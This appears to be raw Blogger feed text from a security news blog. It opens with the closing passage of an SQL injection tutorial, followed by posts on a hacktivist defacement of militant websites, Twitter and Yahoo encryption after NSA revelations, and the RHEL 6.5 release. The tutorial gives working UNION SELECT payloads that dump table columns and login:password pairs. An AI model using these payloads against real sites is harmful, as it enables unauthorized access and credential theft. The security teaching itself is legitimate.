<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(column_name)
</span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: deeppink;">information_schema.columns
</span><span style="color: #fdb910;">where</span> <span style="color: deeppink;">table_name=char(</span><span style="color: #8b4500;">117,115,117,97,114,105,111,115</span><span style="color: deeppink;">)</span><span style="color: #fdb910;"> limit</span> <span style="color: deeppink;">3,4</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">texto</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">text</span>' in 'where clause'
<br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">text</span>'
at line 1 <o:p></o:p></span></span></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: center;">
<b><span lang="PT-BR"><span style="font-family: inherit;">----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<o:p></o:p></span></span></b></div>
<div class="MsoNormal">
<b><span lang="PT-BR"><span style="font-family: inherit;">Extracting
data from the columns of a given table<o:p></o:p></span></span></b></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(login,0x20,0x3a,0x20,senha)</span><span lang="PT-BR"> <span style="color: #fdb910;">from</span>
<span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span>
<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">_Rafa_ : fontes1337</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">_Rafa_ : fontes1337</span>' in
'field list' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">_Rafa_
: fontes1337</span>' at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">group_concat(login,0x20,0x3a,0x20,senha)</span><span lang="PT-BR"> <span style="color: #fdb910;">from</span>
<span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span>
<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers :
mitnick,green : rha_infosec</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">_Rafa_ : fontes1337,l337_ :
3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec</span> ‘in
'field list' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">_Rafa_
: fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green :
rha_infosec</span>' at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat_ws(0x20,0x3a,0x20,login,senha)</span><span lang="PT-BR"> <span style="color: #fdb910;">from</span>
<span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span>
<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 12pt;">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">_RHA_ : infosec1337</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">_RHA_ : infosec1337</span>‘ in
'field list' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">_Mlk_
: gremio1903</span>' at line 1 <br />
<!--[if !supportLineBreakNewLine]--><br />
<!--[endif]--><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 12pt;">
<span lang="PT-BR"><span style="font-family: inherit;">=--------------------------=<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><b><span lang="PT-BR">Concat</span></b><span lang="PT-BR"> <br />
group_concat() <span style="color: dimgrey;">=></span> Search all you want
with ascii caracters<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="PT-BR"><span style="font-family: inherit;">concat() <span style="color: dimgrey;">=></span> search what you want with ascii caracters<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="PT-BR"><span style="font-family: inherit;">concat_ws()
<span style="color: dimgrey;">=></span> unite<br />
<br />
<b>Hexadecimal</b> <br />
0x3a <span style="color: dimgrey;">=></span> : <br />
0x20 <span style="color: dimgrey;">=></span> space<br />
0x2d <span style="color: dimgrey;">=></span> - <br />
0x2b <span style="color: dimgrey;">=></span> + <o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<br /></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">Readers,
this article is for educational purposes only, could continue explaining how to
exploit web sites, but that is not my intention.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">It is
known that the impact of the change may provide unauthorized access to a
restricted area, being imperceptible to the eye of an inexperienced developer,
it may also allow the deletion of a table, compromising the entire application,
among other features. So I want to emphasize that this paper is for security </span>researcher<span style="font-family: inherit;"> and developers to beware and test your code.</span><span style="font-family: Arial, sans-serif; font-size: xx-small;"><o:p></o:p></span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;"><br /></span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<b><span lang="PT-BR" style="font-size: 14pt;"><span style="font-family: inherit;"><u>CONCLUSION</u><o:p></o:p></span></span></b></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span style="font-family: inherit;">Many
companies are providing important information on its website and database,
information is the most valuable asset is intangible, the question is how
developers are dealing with this huge responsibility?</span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">The
challenge is to develop increasingly innovative sites, coupled with mechanisms
that will provide security to users.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">
</span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">The
purpose of this paper is to present what is SQL Injection, how applications are
explored and techniques for testing by allowing the developer to customize a
system more robust and understand the vulnerability.</span><span style="font-family: Arial, sans-serif;"><o:p></o:p></span></span></div>
<div class="MsoNoSpacing" style="text-align: center;">
<span lang="PT-BR"><span style="font-family: inherit;">**********</span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">I hope you all will enjoy the above article, as I did. On behalf of entire <b><a href="http://www.voiceofgreyhat.com/">VOGH Team</a></b> I am </span>sincerely<span style="font-family: inherit;"> thanking Mr. Rafael Souza for his remarkable contribution. </span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with <b><a href="http://www.voiceofgreyhat.com/">VOGH</a></b>. </span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;"><br /></span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<br /></div>
</div>
</div>
</div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-70812867951518766942013-11-30T15:12:00.001+05:302013-11-30T15:12:30.204+05:30Indian Hacker 'Godzilla' Hacked & Defaced Two Websites of Lashkar-e-Taiba<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">Lashkar-e-Taiba</span></b> Official Website <b>Hacked</b> & <b>Defaced</b> By Indian Hacker <b style="text-align: justify;">Godzilla</b><span style="text-align: justify;"> </span>(</span><span style="font-size: large;">Payback of <b><span style="color: red;">26/11</span></b>)</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzGyu_Hxmo6Sc4Gpxz9fNzudst2jyDftlPBeXXwUA7hzzRodJYg3HI2oSWp22r8AZ1JKPQeoGLgbxcC38CiXwn0AenoueeOA3G3DgHrfsFZ8croNFz-HexIXtOmqi2_RxWtx5TsG69PhI/s1600/lashkar-e-taiba-official-website-hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzGyu_Hxmo6Sc4Gpxz9fNzudst2jyDftlPBeXXwUA7hzzRodJYg3HI2oSWp22r8AZ1JKPQeoGLgbxcC38CiXwn0AenoueeOA3G3DgHrfsFZ8croNFz-HexIXtOmqi2_RxWtx5TsG69PhI/s400/lashkar-e-taiba-official-website-hacked.png" width="400" /></a></div>
<div style="text-align: justify;">
A young <a href="http://www.voiceofgreyhat.com/search/label/indian">Indian hacker</a> going by the name of <b>Godzilla</b> have targeted couple of websites of infamous militant groups <b><span style="color: red;">Lashkar-e-Taiba (LT)</span></b>. Which is widely known to us as one of the largest and most active pure jihadi organizations in South Asia, operating mainly from <a href="http://www.voiceofgreyhat.com/search?q=Pakistan">Pakistan</a>. As per sources the hacker managed to gain access on the servers hosting both <b><a href="http://jamatdawa.org/">jamatdawa.org</a></b> & <b><a href="http://jamatdawa.net/">jamatdawa.net</a></b>; during this round of <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">cyber attack</a> he not only onslaught the LT server but also change the index page of those above mentioned site. The hacker left his message in the index page saying <i>"Hafiz Muhammad Saeed, its a promise from our side you will not stay in Pakistan for a longer time."</i> For those who are unaware of Hafiz Muhammad, Hafiz is the founder and one of master mind of Lashkar-e-Taiba, he was behind most notably the 2001 Indian Parliament attack and the 2008 Mumbai attacks. And this hack of Godzilla was directly linked to Mumbai attack of 26/11, in the defaced index page hacker quoted<i><span style="color: red;"><b> "26/11 we will never forget." </b></span></i>The <a href="http://www.voiceofgreyhat.com/search/label/defacement">defacement </a>has also been done on the very 26th November as payback to Lashkar's brutal attack on Mumbai which killed 170 innocent civilian. While writing this news, both the above website of Lashkar is still under constriction, but you can find the deface mirror from <a href="http://zone-hc.com/archive/mirror/45a0f4a_jamatdawa.org_mirror_.html">Zone-hc.com</a>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-37196387040419544952013-11-30T03:33:00.001+05:302013-11-30T03:33:33.485+05:30Twitter & Yahoo Tightening Their Security to Prevent Eavesdropping of NSA<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: #0b5394;">Twitter </span></b>& <b><span style="color: #674ea7;">Yahoo </span>Tightening </b>Their Security to Prevent <b><span style="color: red;">Eavesdropping </span></b>of <b><span style="color: red;">NSA </span></b>& Other Govt Agencies </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0EOuJMSHqQGdUYvs6efDdHgOGpYwyTZorO_ObxDKpbZYcGW3d5MzZLEzDg6GbA3Bmwsp_zHjTcxwo9YDrq5I6oR9U_LKUchYVHA6cBXSu1PXU5s_M1R5pKYLlE0MYyEbdCuwNNAFwz68/s1600/twitter-yahoo-tightening-security-2stop-eavesdropping.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0EOuJMSHqQGdUYvs6efDdHgOGpYwyTZorO_ObxDKpbZYcGW3d5MzZLEzDg6GbA3Bmwsp_zHjTcxwo9YDrq5I6oR9U_LKUchYVHA6cBXSu1PXU5s_M1R5pKYLlE0MYyEbdCuwNNAFwz68/s400/twitter-yahoo-tightening-security-2stop-eavesdropping.jpg" width="400" /></a></div>
Last month a untold and sensational story <a href="http://www.washingtonpost.com/world/national-security/nsa-infiltrates-links-to-yahoo-google-data-centers-worldwide-snowden-documents-say/2013/10/30/e51d661e-4166-11e3-8b74-d89d714ca4dd_story.html">came to light</a>, when the whistle blowers <b><a href="http://www.voiceofgreyhat.com/search?q=Edward+Snowden">Edward Snowden </a></b>unveiled one of the top secret program of <b><a href="http://www.voiceofgreyhat.com/search?q=NSA">NSA</a> </b>called called <b><span style="color: red;">“Muscular”</span> </b>Former NSA contractor <a href="http://www.voiceofgreyhat.com/search?q=Edward+Snowden">Snowden </a>himself disclosed that the National Security Agency has secretly <a href="http://www.voiceofgreyhat.com/search?q=breach">broken into</a> the main communications links that connect <b><a href="http://www.voiceofgreyhat.com/search?q=Yahoo">Yahoo</a></b> and <b><a href="http://www.voiceofgreyhat.com/search?q=Google">Google</a></b> data centers around the world in order to collect and snoop the private data of millions of internet users. NSA’s acquisitions directorate sends millions of records every day from internal Yahoo and Google networks to data warehouses at the agency’s headquarters at Fort Meade, Md. In the preceding 30 days, the report said, field collectors had processed and sent back <b>181,280,466</b> new records including “metadata,” which would indicate who sent or received e-mails and when, as well as content such as text, audio and video. Both Yahoo & Google said that they had never gave access to nay Govt agency to their data centers. Yahoo spokeswoman said, <i>“We have strict controls in place to protect the security of our data centers, and we have not given access to our data centers to the NSA or to any other government agency.”</i> Google’s chief legal officer, David Drummond said <i>“We are outraged at the lengths to which the government seems to have gone to intercept data from our private fiber networks, and it underscores the need for urgent reform,” </i><br />
<i><br /></i>
But the matter of fact is that NSA has indeed sniffed the personal & private communication of million internet users of tech giants like Yahoo and Google. To get rid of this kind of privacy breach, now the tech giants who hold the personal record and credential of mass, are tightening and enhancing their existing security system. According to <b>Marissa Mayer</b>, CEO of Yahoo <i>"We’ve worked hard over the years to earn our users’ trust and we fight hard to preserve it."</i> Yahoo also says it will encrypt all information moving between its data centers by the end of the first quarter, and it will work on getting international partners to enable HTTPS <a href="http://www.voiceofgreyhat.com/search?q=encryption">encryption</a> in Yahoo-branded Mail services.Yahoo says it will give users an option to encrypt all data flow to and from Yahoo. <i>"Yahoo has never given access to our data centers to the NSA or to any other government agency ever. There is nothing more important to us than protecting our users’ privacy. To that end, we recently announced that we will make Yahoo Mail even more secure by introducing https (SSL - Secure Sockets Layer) encryption with a 2048-bit key across our network by January 8, 2014."</i> added <a href="http://yahoo.tumblr.com/post/67373852814/our-commitment-to-protecting-your-information">Marissa Mayer</a>.<br />
<br /></div>
<div style="text-align: justify;">
Not only Yahoo, but the <a href="http://www.voiceofgreyhat.com/search?q=social+network">social networking</a> giant <a href="http://www.voiceofgreyhat.com/search?q=twitter">Twitter</a>, who have registered users of almost 550 million with an active user of 250 million across the globe has also taken immediate steps after this breathtaking story of spying by NSA get the spot light. Twitter is implementing new <a href="http://www.voiceofgreyhat.com/search?q=security">security measures</a> that should make it much more difficult for anyone to eavesdrop on communications between its servers and users. The entire security mechanism has been taken to tighten the data privacy of its users. According to a blog post of twitter the company has implemented<b> "perfect forward secrecy"</b> on its Web and mobile platforms, which <b>made eavesdropping almost impossibl</b>e. "As part of our continuing effort to keep our users’ information as secure as possible, we’re happy to announce that we recently enabled forward secrecy for traffic on twitter.com, api.twitter.com, and mobile.twitter.com. On top of the usual confidentiality and integrity properties of HTTPS, forward secrecy adds a new property. If an adversary is currently recording all Twitter users’ encrypted traffic, and they later crack or steal Twitter’s private keys, they should not be able to use those keys to decrypt the recorded traffic." -said the <a href="https://blog.twitter.com/2013/forward-secrecy-at-twitter-0">blog post</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
While talking about Muscular program of NSA, we would also like to remind you that couple weeks ago we came to know about <a href="http://www.voiceofgreyhat.com/2013/11/snowden-unveiled-royal-concierge-GCHQ.html">'Royal Concierge'</a> another secret program of <a href="http://www.voiceofgreyhat.com/search?q=GCHQ">GCHQ</a> & <a href="http://www.voiceofgreyhat.com/search?q=GCHQ">NSA</a> to spy foreign diplomats through hotel bookings uncovered by Edward Snowden.<br />
<br />
<div style="text-align: right;">
<span style="font-size: xx-small;">-Source (<a href="http://www.cio.com/article/743653/Twitter_Tightens_Security_Against_NSA_Snooping?taxonomyId=1375">CIO</a> & <a href="http://www.pcworld.com/article/2064507/in-the-wake-of-nsa-spying-yahoo-promises-encryption-everywhere.html">PC World</a>)</span> </div>
<div style="text-align: right;">
<br /></div>
<div style="text-align: right;">
<br /></div>
</div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-20584314742870166512013-11-30T03:32:00.000+05:302013-11-30T03:32:04.582+05:30Red Hat Inc Announced The General Availability Red Hat Enterprise Linux (RHEL) 6.5 <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b>Red Hat Inc</b> Announced The General Availability <b><span style="color: red;">Red Hat Enterprise Linux (RHEL) 6.5 </span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw3UWlbAT9lo_enBdOet8r1w-bpK-GNP6N0K5wK5ybay7w26908sqB_LduEH-0jLcGkJfMz-Lvxf1ih5oKSmneY9Wtd4NgQfvzfcOv-JFsCGILNUiXS56QaNeCdcwL2euvkjey5j2O8xE/s1600/redhat-enterprise-linux-rhel-6.5-released.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw3UWlbAT9lo_enBdOet8r1w-bpK-GNP6N0K5wK5ybay7w26908sqB_LduEH-0jLcGkJfMz-Lvxf1ih5oKSmneY9Wtd4NgQfvzfcOv-JFsCGILNUiXS56QaNeCdcwL2euvkjey5j2O8xE/s400/redhat-enterprise-linux-rhel-6.5-released.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The <b><a href="http://www.voiceofgreyhat.com/search?q=RHEL">RHEL 6x</a></b> series get another important update as <b><a href="http://www.voiceofgreyhat.com/search?q=Red+Hat">Red Hat Inc</a></b>, the world's leading provider of open source solutions announced the general availability of <b><span style="color: red;">Red Hat Enterprise Linux 6.5</span></b>, the latest version of <a href="http://www.voiceofgreyhat.com/search?q=Red%20Hat%20Enterprise%20Linux%206">Red Hat Enterprise Linux 6</a>. According to the official press release of Red Hat -RHEL 6.5 expands Red Hat’s vision of providing an enterprise platform that has the stability to free IT to take on major infrastructure challenges and the flexibility to handle future requirements, with an extensive partner and support ecosystem. </div>
<div style="text-align: justify;">
Red Hat Enterprise Linux 6.5 is mainly designed for those who build and manage large, complex IT projects, especially enterprises that require an <a href="http://www.voiceofgreyhat.com/search?q=hybrid+cloud">open hybrid cloud</a>. From <a href="http://www.voiceofgreyhat.com/search?q=security">security</a> and <a href="http://www.voiceofgreyhat.com/search?q=networking">networking</a> to <a href="http://www.voiceofgreyhat.com/search?q=virtualization">virtualization</a>, Red Hat Enterprise Linux 6.5 provides the capabilities needed to manage these environments, such as tools that aid in quickly tuning the system to run <b>SAP applications based on published best practices from SAP</b>.“Red Hat Enterprise Linux 6.5 provides the innovation expected from the industry’s leading enterprise Linux operating system while also delivering a mature platform for business operations, be it standardizing operating environments or supporting critical applications. The newest version of Red Hat Enterprise Linux 6 forms the building blocks of the entire Red Hat portfolio, including OpenShift and OpenStack, making it a perfect foundation for enterprises looking to explore the open hybrid cloud.”-said Jim Totton, vice president and general manager of Red Hat Inc. Now lets take a closer look to the main highlights of RHEL 6.5 : </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div>
<b><span style="font-size: large;">Securing the Next-Generation Enterprise</span></b></div>
<div>
Red Hat Enterprise Linux 6.5 continues the push for integrated security functionality that combines ease-of-use and up-to-date security standards into the platform. The addition of a centralized certificate trust store enables standardized certificate access for security services. Also included are tools that meet leading security standards, including OpenSCAP 2.1, which implements the National Institute of Standards and Technology’s (NIST’s) Security Content Automation Protocol (SCAP) 1.2 standard. With these additions, Red Hat Enterprise Linux 6 provides a secure platform upon which to build mission-critical services and applications.</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Networking – When Every (Micro)Second Matters</span></b></div>
<div>
In the financial services and trading-related industries, application latency is measured in microseconds, not seconds. Now, the latest version of Red Hat Enterprise Linux 6 fully supports sub-microsecond clock accuracy over the local area network (LAN) using the Precision Time Protocol (PTP). Precision time synchronization is a key enabler for delivering better performance for high-speed, low latency applications. Red Hat Enterprise Linux 6.5 can now be used to track time on trading transactions, improving time stamp accuracy on archived data or precisely synchronizing time locally or globally. Thanks to other networking enhancements in Red Hat Enterprise Linux 6.5, system administrators now have a more comprehensive view of network activity. These new capabilities enable sysadmins to inspect IGMP (Internet Group Management Protocol) data to list multicast router ports, multicast groups with active subscribers and their associated interfaces, all of which are important to many modern networking scenarios, including streaming media.</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Virtualization Enhancements</span></b></div>
<div>
Red Hat Enterprise Linux 6.5 continues Red Hat’s commitment to improving the overall virtualization experience and includes several improvements that make it a compelling choice for running in virtualized environments. Sysadmins can now dynamically enable or disable virtual processors (vCPUs) in active guests, making it an ideal choice for elastic workloads. The handling of memory intensive applications as Red Hat Enterprise Linux guests has also been improved, with configurations supported for up to 4TB of memory on the Kernel-based Virtual Machine (KVM) hypervisor. The KVM hypervisor also integrates with GlusterFS volumes to provide direct access to the distributed storage platform, improving performance when accessing Red Hat Storage or GlusterFS volumes. Finally, guest drivers have been updated to improve performance of Red Hat Enterprise Linux 6.5 running as a guest on supported third-party hypervisors.</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Evolving Ease-of-Use, Storage, and More</span></b></div>
<div>
As application deployment options grow, portability becomes increasingly important. Red Hat Enterprise Linux 6.5 enables customers to deploy application images in containers created using Docker in their environment of choice: physical, virtual, or cloud. Docker is an open source project to package and run lightweight, self-sufficient containers; containers save developers time by eliminating integration and infrastructure design tasks. Red Hat Enterprise Linux 6.5 stays current with the advancements in Solid-State Drive (SSD) controller interface, introducing support for NVM Express (NVMe)-based SSDs. The NVMe specification aims to standardize the interface for PCIe-based SSDs and its inclusion in Red Hat Enterprise Linux 6.5 positions the platform to support an expanding range of future NVMe-based devices.</div>
<div>
<br /></div>
<div>
Improvements have also been added to improve enterprise storage scalability within Red Hat Enterprise Linux 6.5. It is now possible to configure more than 255 LUNs connected to a single iSCSI target. In addition, control and recovery from SAN for iSCSI and Fibre Channel has been enhanced, and updates to the kexec/kdump mechanism now make it possible to create debug (dump) files on systems configured with very large memory (e.g. 6TB).</div>
<div>
<br /></div>
<div>
Red Hat Enterprise Linux 6.5 makes it easier to track and manage subscription consumption across the enterprise, integrating subscription tracking into existing business workflow. Usability enhancements include support for remote access to Windows clients and servers that use a newer version of the <a href="http://www.voiceofgreyhat.com/search?q=RDP">RDP</a> protocol, including <a href="http://www.voiceofgreyhat.com/search?q=Windows+7">Windows 7</a> and <a href="http://www.voiceofgreyhat.com/search?q=Windows+8">8</a> desktops and <a href="http://www.voiceofgreyhat.com/search?q=Windows+Server+2012">Windows Server 2012</a>. </div>
<div>
<br /></div>
<div style="text-align: center;">
To Download <b>Red Hat Enterprise Linux 6.5</b> Click <b><a href="http://www.redhat.com/products/enterprise-linux/server/download.html">Here</a></b></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
</div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.com